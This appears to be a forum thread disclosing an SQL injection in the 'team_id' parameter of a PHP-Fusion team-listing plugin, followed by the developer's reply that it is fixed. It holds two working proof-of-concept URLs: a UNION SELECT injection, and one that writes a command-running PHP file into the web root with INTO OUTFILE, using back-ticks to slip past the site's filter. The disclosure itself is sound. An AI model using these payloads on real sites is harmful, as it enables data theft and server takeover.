Plugin that allows the site to have a list of all teams / clubs (eg football or hockey) with the playing staff, displaying the standings with the position of command or a list of the best strikers of a championship.
Looking good yes - but it have a possibility to insert an SQL injection.
Details: The "team_id" variable is not probably sanitized before using in SQL query in "team.php", the attack can be elevated as shown in second POC to bypass PHPFusion's GET variable XSS filter. by using back-ticks instead of brackets used in any php function in that case shell_exec().
Condition: magic_quotes_gpc = Off
POC: *http://127.0.0.1/php-fusion/files/infusions/teams_structure/team.php?team_id=-1' union select '1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17
*http://127.0.0.1/php-fusion/files/infusions/teams_structure/team.php?team_id=-1' union select '1','2','<?php $out=id;echo $out; ?>','4','5','6','7','8','9','10','11','12','13','14','15','16','17' into outfile '/var/www/php-fusion/files/images/test.php
When you're at it: There's missing an empty index.php file in the following two maps: "locale" and "ink". I wonder how it got passed by the Addon Approval ?
@smokeman, I fixed the bug, I want to again say thank you for your timely information ... in the coming days, plan to release v4.0, which will be all fixed and new functions